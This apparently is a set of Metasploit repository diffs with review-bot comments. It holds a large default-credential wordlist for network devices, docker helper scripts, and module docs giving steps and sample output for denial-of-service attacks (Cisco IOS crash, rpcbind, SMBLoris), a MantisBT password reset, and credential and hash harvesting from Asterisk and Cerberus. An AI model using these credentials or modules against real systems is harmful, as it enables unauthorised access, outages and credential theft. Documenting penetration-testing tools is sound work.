IntraStack Asante
IntraSwitch Asante
jagadmin jagadmin
JDE JDE
kermit kermit kermit kermit
l2 l2 l2 l2
l3 l3 l3 l3
@ -266,8 +278,6 @@ login access
login admin login admin
login password login password
lp lp lp lp
LUCENT01 UI-PSWD-01
LUCENT02 UI-PSWD-02
m1122 m1122 m1122 m1122
mac mac
maint maint maint maint
@ -278,50 +288,41 @@ manage !manage
manager admin manager admin
manager change_on_install manager change_on_install
manager friend manager friend
Manager friend
manager manager manager manager
Manager Manager
manager sys manager sys
manuf xxyyzz manuf xxyyzz
MDaemon MServer
mediator mediator mediator mediator
MICRO RSX mg3500 merlin
mlusr mlusr mlusr mlusr
monitor monitor monitor monitor
mother fucker
mtch mtch mtch mtch
mtcl mtcl
mtcl mtcl mtcl mtcl
naadmin naadmin naadmin naadmin
NAU NAU
netangr attack netangr attack
netman netman
netman netman netman netman
netopia netopia netopia netopia
netrangr attack netrangr attack
netscreen netscreen netscreen netscreen
NETWORK NETWORK
NICONEX NICONEX
nms nmspw nms nmspw
nokai nokai nokai nokai
nokia nokia nokia nokia
none 0 none 0
none admin none admin
operator
operator 1234
operator $chwarzepumpe
operator operator
op op op op
op operator op operator
operator
operator $chwarzepumpe
operator 1234
operator operator
oracle oracle
patrol patrol patrol patrol
PBX PBX
PFCUser 240653C9467E45
piranha piranha piranha piranha
piranha q piranha q
pmd pmd
poll tech poll tech
Polycom SpIp
PRODDTA PRODDTA
PSEAdmin $secure$
public public
public public public public
radware radware radware radware
@ -331,7 +332,89 @@ readonly lucenttech2
readwrite lucenttech1 readwrite lucenttech1
recovery recovery recovery recovery
replicator replicator replicator replicator
RMUser1 password ro ro
root
root 000000
root 1111
root 1234
root 12345
root 123456
root 1234567890
root 1234qwer
root 123qwe
root 1q2w3e4r5
root 3ep5w2u
root 54321
root 666666
root 7ujMko0admin
root 7ujMko0vizxv
root 888888
root Admin
root Cisco
root GMB182
root LSiuY7pOmZG2s
root Mau'dib
root PASSWORD
root ROOT500
root Serv4EMC
root Zte521
root abc123
root admin
root admin1234
root admin_1
root ahetzip8
root alpine
root anko
root antslq
root ascend
root attack
root avtech
root b120root
root bananapi
root blender
root calvin
root changeme
root cms500
root comcom
root coolphoenix579
root davox
root default
root dreambox
root fivranne
root ggdaseuaimhrke
root hi3518
root iDirect
root ikwb
root ikwd
root jauntech
root juantech
root jvbzd
root klv123
root klv1234
root letacla
root maxided
root oelinux123
root openssh
root openvpnas
root orion99
root pa55w0rd
root pass
root password
root permit
root realtek
root root
root tini
root tslinux
root user
root vizxv
root wyse
root xc3511
root xmhdipc
root zlxx.
root zte9x15
router router
rw rw
rwa rwa
sa sa
scmadmin scmchangeme scmadmin scmchangeme
scout scout scout scout
@ -346,44 +429,55 @@ smc smcadmin
spcl 0 spcl 0
storwatch specialist storwatch specialist
stratacom stratauser stratacom stratauser
su super
super 5777364 super 5777364
super super
super surt
super.super
super.super master
superadmin secret superadmin secret
superman 21241036 superman 21241036
superman talent superman talent
super super
super.super
super.super master
super surt
superuser superuser
superuser 123456 superuser 123456
superuser admin superuser admin
supervisor PlsChgMe! supervisor PlsChgMe!
supervisor PlsChgMe1 supervisor PlsChgMe1
supervisor supervisor supervisor supervisor
supervisor zyad1234
support 123
support 1234
support 12345
support 123456
support admin
support h179350 support h179350
support login
support support support support
support supportpw support supportpw
su super support zlxx.
Sweex Mysweex sys uplink
sysadm Admin sysadm Admin
sysadm PASS
sysadm anicust sysadm anicust
sysadm sysadm
sysadmin PASS sysadmin PASS
sysadmin password sysadmin password
sysadmin sysadmin sysadmin sysadmin
sysadm PASS system change_on_install
sysadm sysadm system password
SYSADM sysadm system sys
sys uplink system/manager sys/change_on_install
target password target password
teacher password teacher password
tech tech
tech ANYCOM tech ANYCOM
tech field
tech ILMI tech ILMI
tech field
tech tech tech tech
telco telco telco telco
telecom telecom telecom telecom
tellabs tellabs#1 tellabs tellabs#1
telnet telnet
temp1 password temp1 password
test test test test
tiara tiaranet tiara tiaranet
@ -391,19 +485,17 @@ tiger tiger123
topicalt password topicalt password
topicnorm password topicnorm password
topicres password topicres password
ubnt ubnt
user user
USERID PASSW0RD user 123456
user pass user pass
user password user password
User Password
user public user public
user tivonpw user tivonpw
user user user user
vcr NetVCR vcr NetVCR
VNC winterm
volition volition volition volition
vt100 public vt100 public
VTech VTech
webadmin 1234 webadmin 1234
webadmin webadmin webadmin webadmin
websecadm changeme websecadm changeme
@ -412,4 +504,3 @@ wradmin trancell
write private write private
xd xd xd xd
xxx cascade xxx cascade
ZXDSL ZXDSL

@ -4,7 +4,7 @@ services:
image: metasploit image: metasploit
build: build:
context: . context: .
dockerfile: ./docker/Dockerfile dockerfile: ./Dockerfile
environment: environment:
DATABASE_URL: postgres://postgres@db:5432/msf DATABASE_URL: postgres://postgres@db:5432/msf
links: links:

@ -17,5 +17,9 @@ if [[ -z "$MSF_PATH" ]]; then
MSF_PATH=$(dirname $(dirname $path)) MSF_PATH=$(dirname $(dirname $path))
fi fi
if [[ -n "$MSF_BUILD" ]]; then
docker-compose -f $MSF_PATH/docker-compose.yml build
fi
cd $MSF_PATH cd $MSF_PATH
docker-compose run --rm --service-ports ms ./msfvenom "$@" docker-compose run --rm --service-ports ms ./msfvenom "$@"
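Review bot: `-f $MSF_PATH/docker-compose.yml` and `cd $MSF_PATH` leave the variable unquoted, so a checkout path containing whitespace is split into several words; quote it as `"$MSF_PATH"` in both places. The new `MSF_BUILD` switch is also undocumented; a one-line comment saying that any non-empty value forces a rebuild before running would help.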

docker/bin/msfvenom-dev (new executable file, 26 lines)
@ -0,0 +1,26 @@
#! /bin/bash
if [[ -z "$MSF_PATH" ]]; then
path=`dirname $0`
# check for ./docker/msfconsole.rc
if [[ ! -f $path/../msfconsole.rc ]] ; then
# we are not inside the project
realpath --version > /dev/null 2>&1 || { echo >&2 "I couldn't find where metasploit is. Set \$MSF_PATH or execute this from the project root"; exit 1 ;}
# determine script path
pushd $(dirname $(realpath $0)) > /dev/null
path=$(pwd)
popd > /dev/null
fi
MSF_PATH=$(dirname $(dirname $path))
fi
cd $MSF_PATH
if [[ -n "$MSF_BUILD" ]]; then
docker-compose -f $MSF_PATH/docker-compose.yml -f $MSF_PATH/docker/docker-compose.development.override.yml build
fi
docker-compose -f $MSF_PATH/docker-compose.yml -f $MSF_PATH/docker/docker-compose.development.override.yml run --rm --service-ports ms ./msfvenom "$@"
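Review bot: the same quoting problem as in `docker/bin/msfvenom`: `$path`, `$0` and `$MSF_PATH` are unquoted throughout (`pushd $(dirname $(realpath $0))`, `cd $MSF_PATH`, the `-f` arguments), so any path with whitespace breaks the script. The path-detection block appears to be a verbatim copy of the one in `docker/bin/msfvenom`, differing only in the extra `-f ...docker-compose.development.override.yml`; consider sourcing a shared helper or passing the override file through an environment variable rather than maintaining a second copy.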

@ -14,9 +14,9 @@ Naturally, audio should be cranked to 11 before running this module.
The YouTube video to be played. Defaults to [kxopViU98Xo](https://www.youtube.com/watch?v=kxopViU98Xo) The YouTube video to be played. Defaults to [kxopViU98Xo](https://www.youtube.com/watch?v=kxopViU98Xo)
## Sample Output ## Scenarios
Of note, this was played on a 1st generation Google Chromecast (USB stick looking, not circular) ### 1st generation Google Chromecast (USB stick looking, not circular)
``` ```
msf > auxiliary/admin/chromecast/chromecast_youtube msf > auxiliary/admin/chromecast/chromecast_youtube

@ -0,0 +1,30 @@
# Dynamic DNS Update Injection
`dyn_dns_update` module allows adding or deleting DNS records
on a DNS server that allows unrestricted dynamic updates.
## Vulnerable Application
Any DNS server that allows dynamic update for none trusted source IPs.
## Verification Steps
1. Start msfconsole
2. Do: ```auxiliary/scanner/dns/dyn_dns_update```
3. Do: ```set DOMAIN [IP]```
4. Do: ```set NS [IP]```
5. Do: ```set INJECTDOMAIN [IP]```
6. Do: ```set INJECTIP [IP]```
7. Do: ```set ACTION ADD```
8. Do: ```run```
## Actions
There are two kind of actions the module can run:
1. **ADD** - Add a new record. [Default]
2. **DEL** - Delete an existing record.
## Targeting Information
WPAD may not work with Windows 2008+ targets due to a DNS block list: https://technet.microsoft.com/en-us/library/cc995261.aspx
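Review bot: the verification steps do not match the option semantics: `set DOMAIN [IP]` and `set INJECTDOMAIN [IP]` take a domain name, not an address, so the placeholders should read `[domain]`; `none trusted source IPs` should be `untrusted source IPs`; and the `Targeting Information` note about WPAD is unexplained in this document, so say why WPAD is relevant to a dynamic-update module. Minor: the inline commands are wrapped in triple backticks where single backticks are the convention in the other module docs.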

@ -0,0 +1,30 @@
## Vulnerable Application
MantisBT before 1.3.10, 2.2.4, and 2.3.1, that can be downloaded
on
[Sourceforge](https://sourceforge.net/projects/mantisbt/files/mantis-stable/).
## Verification Steps
1. Install the vulnerable software
2. Start msfconsole
3. Do: ```use auxiliary/admin/http/mantisbt_password_reset```
4. Do: ```set rhost```
5. Do: ```run```
6. If the system is vulnerable, the module should tell you that the password
was successfully changed.
## Scenarios
```
msf > use auxiliary/admin/http/mantisbt_password_reset
msf auxiliary(mantisbt_password_reset) > set rport 8082
rport => 8082
msf auxiliary(mantisbt_password_reset) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf auxiliary(mantisbt_password_reset) > run
[+] Password successfully changed to 'ndOQTmhQ'.
[*] Auxiliary module execution completed
msf auxiliary(mantisbt_password_reset) >
```
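Review bot: `MantisBT before 1.3.10, 2.2.4, and 2.3.1` is ambiguous about which branches are meant; spell it out (1.3.x before 1.3.10, 2.2.x before 2.2.4, 2.3.x before 2.3.1) if that is the intent. Step 4 `set rhost` is missing its value (`set rhost [IP]`), and the scenario sets `rport 8082` while the steps never mention that a non-default port may be needed; add that to the steps.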

@ -27,7 +27,7 @@
7. You should get credentials 7. You should get credentials
## Sample Output ## Scenarios
``` ```
[+] 172.16.191.166:8080 Authenticated successfully as 'admin' [+] 172.16.191.166:8080 Authenticated successfully as 'admin'

@ -28,13 +28,14 @@ Bluetooth HWBridge adapters, depending on the Operating System, may take several
The following steps were [recorded during the testing of this module](https://github.com/rapid7/metasploit-framework/pull/7795#issuecomment-274302326) The following steps were [recorded during the testing of this module](https://github.com/rapid7/metasploit-framework/pull/7795#issuecomment-274302326)
on setting up the [BAFX 34t5](https://bafxpro.com/products/obdreader) with Kali Linux 2016.2 (rolling). on setting up the [BAFX 34t5](https://bafxpro.com/products/obdreader) with Kali Linux 2016.2 (rolling).
1. Ensure no locks on the Bluetooth device via: `rfkill list` (and subsequent `unblock` commands) 1. Most Bluetooth HWBridge adapters, speak serial. So you will need to get the ruby gem "serialport": ```gem install serialport```
2. Make sure Bluetooth service is started: `/etc/init.d/bluetooth start`, or `bluetoothd` 2. Ensure no locks on the Bluetooth device via: `rfkill list` (and subsequent `unblock` commands)
3. Start bluetoothctl: `bluetoothctl` 3. Make sure Bluetooth service is started: `/etc/init.d/bluetooth start`, or `bluetoothd`
4. Turn on scanning: `scan on` 4. Start bluetoothctl: `bluetoothctl`
5. Turn on agent: `agent on` 5. Turn on scanning: `scan on`
6. Make sure we can see OBDII: `devices` 6. Turn on agent: `agent on`
7. Attempt to pair: `[bluetooth]# pair 00:0D:18:AA:AA:AA` 7. Make sure we can see OBDII: `devices`
8. Attempt to pair: `[bluetooth]# pair 00:0D:18:AA:AA:AA`
``` ```
Attempting to pair with 00:0D:18:AA:AA:AA Attempting to pair with 00:0D:18:AA:AA:AA
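Review bot: stray comma in the new step 1, `Most Bluetooth HWBridge adapters, speak serial`; also that step wraps `gem install serialport` in triple backticks while the renumbered steps that follow use single backticks, so make the inline-code style consistent.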

@ -0,0 +1,161 @@
## Vulnerable Application
1. Obtain a Cisco switch of any model indicated here that is running vulnerable firmware: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp. Note that the vulnerability spans many years. We tested two firmwares 10 years apart and were able to verify exploitability.
2. Enable telnet access and verify that you can reach the switch normally via that mode.
## Verification Steps
1. Start msfconsole
2. Do: `use auxiliary/dos/cisco/ios_telnet_rocem`
3. Do: `set RHOST 192.168.1.10`
4. Do: ```run```
5. The switch should restart and display crash information on the console.
## Scenarios
```
Switch#sh ver
*Mar 1 01:28:01.802: %SYS-5-CONFIG_I: Configured from console by console
Cisco IOS Software, C3750 Software (C3750-IPBASEK9-M), Version 12.2(53)SE2, RELEASE SOFTWARE (fc3)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2010 by Cisco Systems, Inc.
Compiled Wed 21-Apr-10 04:49 by prod_rel_team
Image text-base: 0x01000000, data-base: 0x02C00000
ROM: Bootstrap program is C3750 boot loader
BOOTLDR: C3750 Boot Loader (C3750-HBOOT-M) Version 12.2(44)SE5, RELEASE SOFTWARE (fc1)
Switch uptime is 1 hour, 28 minutes
System returned to ROM by power-on
System image file is "flash:/c3750-ipbasek9-mz.122-53.SE2/c3750-ipbasek9-mz.122-53.SE2.bin"
[...]
cisco WS-C3750-48TS (PowerPC405) processor (revision M0) with 131072K bytes of memory.
Processor board ID CAT1017Z2Z2
Last reset from power-on
1 Virtual Ethernet interface
48 FastEthernet interfaces
4 Gigabit Ethernet interfaces
The password-recovery mechanism is enabled.
[...]
Cisco IOS Software, C3750 Software (C3750-IPSERVICESK9-M), Version 12.2(55)SE10, RELEASE SOFTWARE (fc2)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2015 by Cisco Systems, Inc.
Compiled Wed 11-Feb-15 11:40 by prod_rel_team
Image text-base: 0x01000000, data-base: 0x02F00000
[...]
Election Complete
Switch 2 booting as Master
Waiting for Port download...Complete
[...]
cisco WS-C3750-48TS (PowerPC405) processor (revision M0) with 131072K bytes of memory.
Processor board ID CAT1017Z2Z2
Last reset from power-on
1 Virtual Ethernet interface
48 FastEthernet interfaces
4 Gigabit Ethernet interfaces
The password-recovery mechanism is enabled.
[...]
Switch Ports Model SW Version SW Image
------ ----- ----- ---------- ----------
* 2 52 WS-C3750-48TS 12.2(55)SE10 C3750-IPSERVICESK9-M
[... booted successfully, waiting at a prompt, DoS exploit follows ...]
Switch#
00:37:15 UTC Mon Mar 1 1993: Unexpected exception to CPUvector 400, PC = 41414140
-Traceback= 41414140
Writing crashinfo to flash:/crashinfo_ext/crashinfo_ext_1
=== Flushing messages (00:37:19 UTC Mon Mar 1 1993) ===
Buffered messages:
00:00:26: %STACKMGR-4-SWITCH_ADDED: Switch 1 has been ADDED to the stack
00:00:27: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to down
00:00:29: %SPANTREE-5-EXTENDED_SYSID: Extended SysId enabled for type vlan
00:00:50: %STACKMGR-5-SWITCH_READY: Switch 1 is READY
00:00:50: %STACKMGR-4-STACK_LINK_CHANGE: Stack Port 1 Switch 1 has changed to state DOWN
00:00:50: %STACKMGR-4-STACK_LINK_CHANGE: Stack Port 2 Switch 1 has changed to state DOWN
00:00:50: %STACKMGR-5-MASTER_READY: Master Switch 1 is READY
00:00:50: %SYS-5-RESTART: System restarted --
Cisco IOS Software, C3750 Software (C3750-IPBASEK9-M), Version 12.2(35)SE5, RELEASE SOFTWARE (fc1)
Copyright (c) 1986-2007 by Cisco Systems, Inc.
Compiled Fri 20-Jul-07 01:58 by nachen
00:01:48: %SYS-5-CONFIG_I: Configured from console by console
00:27:53: %LINK-3-UPDOWN: Interface FastEthernet1/0/1, changed state to up
00:27:54: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet1/0/1, changed state to up
00:28:22: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to up
00:30:00: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet1/0/1, changed state to down
00:30:00: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to down
00:30:01: %LINK-3-UPDOWN: Interface FastEthernet1/0/1, changed state to down
00:32:44: %LINK-3-UPDOWN: Interface FastEthernet1/0/1, changed state to up
00:32:45: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet1/0/1, changed state to up
00:33:13: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to up
Queued messages:
Cisco IOS Software, C3750 Software (C3750-IPBASEK9-M), Version 12.2(35)SE5, RELEASE SOFTWARE (fc1)
Copyright (c) 1986-2007 by Cisco Systems, Inc.
Compiled Fri 20-Jul-07 01:58 by nachen
Instruction Access Exception (0x0400)!
SRR0 = 0x41414140 SRR1 = 0x00029230 SRR2 = 0x00648990 SRR3 = 0x00021200
ESR = 0x00000000 DEAR = 0x00000000 TSR = 0x8C000000 DBSR = 0x00000000
CPU Register Context:
Vector = 0x00000400 PC = 0x41414140 MSR = 0x00029230 CR = 0x53000005
LR = 0x41414141 CTR = 0x0004D860 XER = 0xC0000050
R0 = 0x41414141 R1 = 0x02DDEE80 R2 = 0x00000000 R3 = 0x0358907C
R4 = 0x00000001 R5 = 0xFFFFFFFF R6 = 0x0182C1B0 R7 = 0x00000000
R8 = 0x00000001 R9 = 0x0290C84C R10 = 0x00000031 R11 = 0x00000000
R12 = 0x00221C89 R13 = 0x00110000 R14 = 0x00BD7284 R15 = 0x00000000
R16 = 0x00000000 R17 = 0x00000000 R18 = 0x00000000 R19 = 0x00000000
R20 = 0xFFFFFFFF R21 = 0x00000000 R22 = 0x00000000 R23 = 0x02DDF078
R24 = 0x00000000 R25 = 0x00000001 R26 = 0x000003FB R27 = 0x00000024
R28 = 0x41414141 R29 = 0x41414141 R30 = 0x41414141 R31 = 0x41414141
Stack trace:
PC = 0x41414140, SP = 0x02DDEE80
Frame 00: SP = 0x41414141 PC = 0x41414141
Switch uptime is 37 minutes, 22 seconds
[... rebooting ... ]
Switch Ports Model SW Version SW Image
------ ----- ----- ---------- ----------
* 1 52 WS-C3750-48TS 12.2(35)SE5 C3750-IPBASEK9-M
Failed to generate persistent self-signed certificate.
Secure server will use temporary self-signed certificate.
Press RETURN to get started!
00:00:26: %STACKMGR-4-SWITCH_ADDED: Switch 1 has been ADDED to the stack
00:00:27: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to down
00:00:29: %SPANTREE-5-EXTENDED_SYSID: Extended SysId enabled for type vlan
00:00:31: %SYS-5-CONFIG_I: Configured from memory by console
00:00:31: %STACKMGR-5-SWITCH_READY: Switch 1 is READY
00:00:31: %STACKMGR-4-STACK_LINK_CHANGE: Stack Port 1 Switch 1 has changed to state DOWN
00:00:31: %STACKMGR-4-STACK_LINK_CHANGE: Stack Port 2 Switch 1 h
Switch>
Switch>as changed to state DOWN
00:00:32: %STACKMGR-5-MASTER_READY: Master Switch 1 is READY
00:00:32: %SYS-5-RESTART: System restarted --
Cisco IOS Software, C3750 Software (C3750-IPBASEK9-M), Version 12.2(35)SE5, RELEASE SOFTWARE (fc1)
Copyright (c) 1986-2007 by Cisco Systems, Inc.
Compiled Fri 20-Jul-07 01:58 by nachen
00:00:33: %LINK-3-UPDOWN: Interface FastEthernet1/0/1, changed state to up
00:00:34: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet1/0/1, changed state to up
Switch>
Switch>
00:01:04: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to up
00:01:32: %PLATFORM-1-CRASHED: System previously crashed with the following message:
00:01:32: %PLATFORM-1-CRASHED: Cisco IOS Software, C3750 Software (C3750-IPBASEK9-M), Version 12.2(35)SE5, RELEASE SOFTWARE (fc1)
00:01:32: %PLATFORM-1-CRASHED: Copyright (c) 1986-2007 by Cisco Systems, Inc.
00:01:32: %PLATFORM-1-CRASHED: Compiled Fri 20-Jul-07 01:58 by nachen
00:01:32: %PLATFORM-1-CRASHED:
00:01:32: %PLATFORM-1-CRASHED: Instruction Access Exception (0x0400)!
00:01:32: %PLATFORM-1-CRASHED:
00:01:32: %PLATFORM-1-CRASHED: SRR0 = 0x41414140 SRR1 = 0x00029230 SRR2 = 0x00648990 SRR3 = 0x00021200
00:01:32: %PLATFORM-1-CRASHED: ESR = 0x00000000 DEAR = 0x00000000 TSR = 0x8C000000 DBSR = 0x00000000
00:01:32: %PLATFORM-1-CRASHED:
00:01:32: %PLATFORM-1-CRASHED: CPU Register Context:
00:01:32: %PLATFORM-1-CRASHED: Vector = 0x00000400 PC = 0x41414140 MSR = 0x00029230 CR = 0x53000005
00:01:32: %PLATFORM-1-CRASHED: LR = 0x41414141 CTR = 0x0004D860 XER = 0xC0000050
00:01:32: %PLATFORM-1-CRASHED: R0 = 0x41414141 R1 = 0x02DDEE80 R2 = 0x00000000 R3 = 0x0358907C
00:01:32: %PLATFORM-1-CRASHED: R4 = 0x00000001 R5 = 0xFFFFFFFF R6 = 0x0182C1B0 R7 = 0x00000000
00:01:32: %PLATFORM-1-CRASHED: R8 = 0x00000001 R9 = 0x0290C84C R10 = 0x00000031 R11 = 0x00000000
00:01:32: %PLATFORM-1-CRASHED: R12 = 0x00221C89 R13 = 0x00110000 R14 = 0x00BD7284 R15 = 0x00000000
00:01:32: %PLATFORM-1-CRASHED: R16 = 0x00000000 R17 = 0x00000000 R18 = 0x00000000 R19 = 0x00000000
00:01:32: %PLATFORM-1-CRASHED: R20 = 0xFFFFFFFF R21 = 0x00000000 R22 = 0x00000000 R23 = 0x02DDF078
00:01:32: %PLATFORM-1-CRASHED: R24 = 0x00000000 R25 = 0x00000001 R26 = 0x000003FB R27 = 0x00000024
00:01:32: %PLATFORM-1-CRASHED: R28 = 0x41414141 R29 = 0x41414141 R30 = 0x41414141 R31 = 0x41414141
00:01:32: %PLATFORM-1-CRASHED:
00:01:32: %PLATFORM-1-CRASHED: Stack trace:
00:01:32: %PLATFORM-1-CRASHED: PC = 0x41414140, SP = 0x02DDEE80
00:01:32: %PLATFORM-1-CRASHED: Frame 00: SP = 0x41414141 PC = 0x41414141
00:01:32: %PLATFORM-1-CRASHED:
```

View File

@ -0,0 +1,29 @@
## Vulnerable Application
This module [exploits a vulnerability](http://openwall.com/lists/oss-security/2017/05/03/12) in rpcbind through 0.2.4,
LIBTIRPC through 1.0.1 and 1.0.2-rc through 1.0.2-rc3, and NTIRPC through 1.4.3.
Exploiting this vulnerability allows an attacker to trigger large (and never freed) memory allocations for XDR strings on the target.
## Verification Steps
1. Start msfconsole
1. Do: `use auxiliary/dos/rpc/rpcbomb`
1. Do: `set RHOSTS [IP]`
1. Do: `run`
1. Target should leak memory
## Scenarios
### rpcbind 0.2.3-0.2 on Ubuntu 16.04 (amd64)
```
msf > use auxiliary/dos/rpc/rpcbomb
msf auxiliary(rpcbomb) > set RHOSTS 10.0.2.7
RHOSTS => 10.0.2.7
msf auxiliary(rpcbomb) > run
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(rpcbomb) >
```
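Review bot: step 5 says the target should leak memory, but the scenario closes with only `Scanned 1 of 1 hosts (100% complete)` and `Auxiliary module execution completed`, which is exactly what a non-vulnerable host would produce too. Add a sentence under Scenarios saying how the effect was confirmed (for instance by comparing the rpcbind process memory on the target before and after the run), so a reader can tell a successful run from a no-op. The step list also uses `1.` for every item while the other docs in this commit number steps explicitly.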

View File

@ -0,0 +1,43 @@
## Vulnerable Application
This module exploits a vulnerability in the NetBIOS Session Service Header for SMB.
Any Windows machine with SMB Exposed, or any Linux system running Samba are vulnerable.
See [the SMBLoris page](http://smbloris.com/) for details on the vulnerability.
The module opens over 64,000 connections to the target service, so please make sure
your system ULIMIT is set appropriately to handle it. A single host running this module
can theoretically consume up to 8GB of memory on the target.
## Verification Steps
Example steps in this format (is also in the PR):
1. Start msfconsole
1. Do: `use auxiliary/dos/smb/smb_loris`
1. Do: `set RHOST [IP]`
1. Do: `run`
1. Target should allocate increasing amounts of memory.
## Scenarios
###
```
msf auxiliary(smb_loris) > use auxiliary/dos/smb/smb_loris
msf auxiliary(smb_loris) > set RHOST 192.168.172.138
RHOST => 192.168.172.138
msf auxiliary(smb_loris) >
msf auxiliary(smb_loris) > run
[*] 192.168.172.138:445 - Sending packet from Source Port: 1025
[*] 192.168.172.138:445 - Sending packet from Source Port: 1026
[*] 192.168.172.138:445 - Sending packet from Source Port: 1027
[*] 192.168.172.138:445 - Sending packet from Source Port: 1028
[*] 192.168.172.138:445 - Sending packet from Source Port: 1029
[*] 192.168.172.138:445 - Sending packet from Source Port: 1030
[*] 192.168.172.138:445 - Sending packet from Source Port: 1031
[*] 192.168.172.138:445 - Sending packet from Source Port: 1032
[*] 192.168.172.138:445 - Sending packet from Source Port: 1033
....
```
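Review bot: `Example steps in this format (is also in the PR):` under Verification Steps is leftover template text and should be dropped, and the `###` line above the scenario block is an empty heading; give it a title naming the tested target. Two smaller points in the same hunk: `Any Windows machine with SMB Exposed, or any Linux system running Samba are vulnerable` should read `is vulnerable` (and `exposed` in lowercase), and the ULIMIT advice would be more useful with the figure spelled out, since the text already says the module opens over 64,000 connections, so the open-files limit has to exceed that.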

View File

@ -24,7 +24,7 @@ http://advcloudfiles.advantech.com/web/Download/webaccess/8.1/AdvantechWebAccess
## Verification Steps ## Verification Steps
1. Start msfconsole 1. Start msfconsole
2. ```use auxiliary/gahter/advantech_webaccess_creds``` 2. ```use auxiliary/gather/advantech_webaccess_creds```
3. ```set WEBACCESSUSER [USER]``` 3. ```set WEBACCESSUSER [USER]```
4. ```set WEBACCESSPASS [PASS]``` 4. ```set WEBACCESSPASS [PASS]```
5. ```run``` 5. ```run```

View File

@ -0,0 +1,62 @@
## Description
This module retrieves SIP and IAX2 user extensions and credentials from Asterisk Call Manager service.
Valid manager credentials are required.
## Vulnerable Application
[Asterisk](http://www.asterisk.org/get-started/features) offers both classical PBX functionality and advanced features, and interoperates with traditional standards-based telephony systems and Voice over IP systems.
This module has been tested successfully on:
* Asterisk Call Manager version 2.10.0 on Asterisk 13.16.0
* Asterisk Call Manager version 1.1 on Asterisk 1.6.2.11
The following software comes with Asterisk preinstalled and can be used for testing purposes:
* [FreePBX](https://www.freepbx.org/downloads/)
* [VulnVoIP](https://www.rebootuser.com/?p=1069)
Note that Asterisk will reject valid authentication credentials when connecting from a network that has not been permitted using the `permit` directive (or is specifically denied in the `deny` directive) in the Asterisk manager configuration file `/etc/asterisk/manager.conf`.
## Verification Steps
1. Start `msfconsole`
2. Do: `use auxiliary/gather/asterisk_creds`
3. Do: `set rhost <RHOST>`
4. Do: `set rport <RPORT>` (default: `5038`)
5. Do: `set username <USERNAME>` (default: `admin`)
6. Do: `set password <PASSWORD>` (default: `amp111`)
7. Do: `run`
8. You should get credentials
## Scenarios
```
[*] 172.16.191.229:5038 - Found Asterisk Call Manager version 2.10.0
[+] 172.16.191.229:5038 - Authenticated successfully
[*] 172.16.191.229:5038 - Found 9 users
Asterisk User Credentials
=========================
Username Secret Type
-------- ------ ----
100 sip
103 bbf5d449753391a sip
104 273db6cd9ca402f53354 iax2
105 secret password sip
106 "_" ;) iax2
107 123456789 sip
108 ~!@#$%^&*()_+{} sip
109 antidisestablishment iax2
123 y2u.be/VOaZbaPzdsk iax2
[+] 172.16.191.229:5038 - Credentials saved in: /root/.msf4/loot/20170723052316_default_172.16.191.229_asterisk.user.cr_798166.txt
[*] Auxiliary module execution completed
```

View File

@ -9,9 +9,9 @@ The module use the Censys REST API to access the same data accessible through we
5: Do: `set CENSYS_DORK rapid7` 5: Do: `set CENSYS_DORK rapid7`
6: Do: `run` 6: Do: `run`
## Sample Output ## Scenarios
#### Certificates Search ### Certificates Search
``` ```
msf auxiliary(censys_search) > set CENSYS_DORK rapid7 msf auxiliary(censys_search) > set CENSYS_DORK rapid7

View File

@ -0,0 +1,82 @@
## Description
This module opens a `devblocks_cache---ch_workers` or `zend_cache---ch_workers` file which contains a
data structure with username and password hash (MD5) credentials. The contents looks similar to JSON, however it is not.
## Vulnerable Application
This module has been verified against the following Cerberus Helpdesk versions:
1. Version 4.2.3 Stable (Build 925)
2. Version 5.4.4
However it may also work up to, but not including, version 6.7
Version 5.4.4 is available on [exploit-db.com](https://www.exploit-db.com/apps/882596e791e54529b29ecbc6f48a6cb7-cerb5-5_4_4.zip)
* of note, 5.4.4 has to be installed on a PRE php7 environment.
## Verification Steps
1. Start msfconsole
2. ```use auxiliary/gather/cerberus_helpdesk_hash_disclosure```
3. ```set rhosts [rhosts]```
4. ```run```
## Scenarios
### 4.2.3 using zend (not verbose)
```
msf > use auxiliary/gather/cerberus_helpdesk_hash_disclosure
msf auxiliary(cerberus_helpdesk_hash_disclosure) > set rhosts 1.1.1.1
rhosts => 1.1.1.1
msf auxiliary(cerberus_helpdesk_hash_disclosure) > run
[-] Invalid response received for 1.1.1.1 for /storage/tmp/devblocks_cache---ch_workers
[+] Found: admin:aaa34a6111abf0bd1b1c4d7cd7ebb37b
[+] Found: example:112302c209fe8d73f502c132a3da2b1c
[+] Found: foobar:0d108d09e5bbe40aade3de5c81e9e9c7
Cerberus Helpdesk User Credentials
==================================
Username Password Hash
-------- -------------
admin aaa34a6111abf0bd1b1c4d7cd7ebb37b
example 112302c209fe8d73f502c132a3da2b1c
foobar 0d108d09e5bbe40aade3de5c81e9e9c7
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
### 5.4.4 using devblocks
```
msf > use auxiliary/gather/cerberus_helpdesk_hash_disclosure
msf auxiliary(cerberus_helpdesk_hash_disclosure) > set rhosts 192.168.2.45
rhosts => 192.168.2.45
msf auxiliary(cerberus_helpdesk_hash_disclosure) > set targeturi /cerb5/
targeturi => /cerb5/
msf auxiliary(cerberus_helpdesk_hash_disclosure) > set verbose true
verbose => true
msf auxiliary(cerberus_helpdesk_hash_disclosure) > run
[*] Attempting to load data from /cerb5/storage/tmp/devblocks_cache---ch_workers
[+] Found: bar@none.com:37b51d194a7513e45b56f6524f2d51f2
[+] Found: foo@none.com:acbd18db4cc2f85cedef654fccc4a4d8
[+] Found: mike@shorebreaksecurity.com:18126e7bd3f84b3f3e4df094def5b7de
